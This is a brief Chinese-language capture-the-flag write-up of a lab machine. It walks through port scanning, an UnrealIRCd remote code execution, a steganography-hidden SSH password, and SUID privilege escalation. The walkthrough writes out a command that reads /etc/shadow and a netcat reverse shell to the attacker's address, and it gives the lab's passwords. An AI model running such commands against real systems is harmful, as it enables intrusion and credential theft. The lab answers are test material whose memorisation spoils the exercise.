nmap初步扫描发现开了22和80,111这三个端口。

访问80提示 IRC is almost working!

感觉似乎有其他的端口,同时web目录扫描也没发现其他有用的页面。

nmap重新扫一下发现存在其他端口

searchsploit unrealirc直接发现一个RCE,可以得到一个低级的shell。

在djmardov这个用户的documents目录下面发现.backup文件

 

里面有两行话

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

然而第二行并不是该用户的ssh密码。

看了论坛才知道,steg是stego隐写的意思。差评,垃圾CTF隐写套路。

下载stegohide之后输入第二行密码解密,得到  Kab6h+m+bbp2J:HG

这个就是ssh密码,ssh登陆上去,就可以cat user.txt了。

之后的提权是通过SUID查的

find / -perm -u=s -type f 2>/dev/null -exec ls -l {} \\;

发现了一个可疑的viewuser程序

运行提示 /tmp/listusers 不存在

手动创建一个,里面输入cat /etc/shadow然后运行viewuser

发现成功返回了shadow文件内容,直接加一行 nc -vn 10.10.14.40 5555 -e /bin/sh

完事,垃圾box,差评